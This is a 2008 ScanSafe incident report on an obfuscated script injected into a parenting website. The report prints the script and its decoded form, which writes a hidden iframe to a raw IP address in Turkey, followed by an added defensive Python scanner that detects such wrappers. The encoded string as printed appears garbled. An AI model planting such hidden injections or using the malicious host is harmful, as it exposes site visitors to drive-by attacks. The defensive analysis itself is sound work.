ScanSafe



Report Date: April 15, 2008

Sitename: Yeahbaby.com
Nature: Injected iframe
First Blocked: April 7, 2008
Severity: Low - on watch
Summary

On April 7, 2008, ScanSafe detected malicious content on the website www.yeahbaby.com. The website provides information and resources for expectant parents and parents of children from newborn through toddler age. According to Quantcast, “This site reaches over 114K U.S. monthly uniques. The site is popular among a rather female, younger group. The typical visitor visits thinkbabynames.com, frequents babiesonline.com, and shops at babytobee.com.”

Investigation revealed a suspicious iframe embedded, by way of an obfuscated script, in the HTML source of the yeahbaby.com page:

<script>eval(unescape("6964%6f2e 74747327 6f653b%64636 d%6574%2e72%69 %74283c%69726d%65 %2061653720%73 635c68743a2f%38 %38323537%3432 367063%6b69647870 70%3f2b%4d74%687275644d74% 6872%61646d29%2a%3134%39%3129%2b3338333 366%5c206974%6835376869%677433357379%6c%655c 64736c79206f65%5c3e2f%69726d3e29")); </script>

The decoded version is as follows:

window.status='Done'; document.write ('<i frame name=7a src=\'http://88.255.74.226/pack/index.php? '+ Math.round(Math.random ()*174915)+'3387323 df\' width= 507 height= 345 style=\'display: none\'> </i frame>')

The IP address resolves to an international route block in Turkey. At the time of investigation, the site targeted by the iframe was not reachable.
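
A defender-side check for the pattern shown above, added here as an example and not part of the ScanSafe report: it finds eval(unescape(...)) wrappers in page source, decodes them statically without executing anything, and reports each iframe the decoded script writes, noting whether it is hidden and whether it points at a bare IP address. The sample pages, the function names and the 192.0.2.10 documentation address are constructed for the example.

```python
import re

# eval(unescape("...")) or document.write(unescape("...")) wrappers in page source.
WRAPPER = re.compile(
    r"""(?:eval|document\.write)\s*\(\s*unescape\s*\(\s*(["'])(.*?)\1""", re.I | re.S)
IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
SRC = re.compile(r"""src\s*=\s*\\?["']?(https?://[^\s'"\\>]+)""", re.I)
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
RAW_IP = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?=[:/]|$)")

def js_unescape(s):
    """Decode %XX and %uXXXX the way JavaScript's unescape() does."""
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
                  lambda m: chr(int(m.group(1) or m.group(2), 16)), s)

def scan(html):
    """Return one finding per iframe written by an unescape()-wrapped script."""
    findings = []
    for wrapper in WRAPPER.finditer(html):
        decoded = js_unescape(wrapper.group(2))  # static decode, nothing is run
        for tag in IFRAME.finditer(decoded):
            src = SRC.search(tag.group(0))
            url = src.group(1) if src else None
            findings.append({
                "src": url,
                "hidden": bool(HIDDEN.search(tag.group(0))),
                "raw_ip_host": bool(url and RAW_IP.match(url)),
            })
    return findings

# Constructed fixture modelled on the decoded script in the report.
SAMPLE_JS = (r"window.status='Done';document.write('<iframe name=7a "
             r"src=\'http://192.0.2.10/pack/index.php?'+Math.round(Math.random()*174915)"
             r"+'x\' width=507 height=345 style=\'display: none\'></iframe>')")

def encode_fixture(js):
    """Percent-encode every character so the fixture resembles the wrapped form."""
    return "".join("%%%02x" % ord(c) for c in js)

INFECTED = ('<html><body><script>eval(unescape("' + encode_fixture(SAMPLE_JS)
            + '"));</script></body></html>')
CLEAN = '<html><body><iframe src="https://example.com/video" width="560"></iframe></body></html>'

if __name__ == "__main__":
    for name, page in (("infected", INFECTED), ("clean", CLEAN)):
        print(name, scan(page))
```

The check only inspects iframes produced inside a decoded wrapper, so an ordinary visible iframe in the page markup is not reported.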

This form was completed by:  Mary Landesman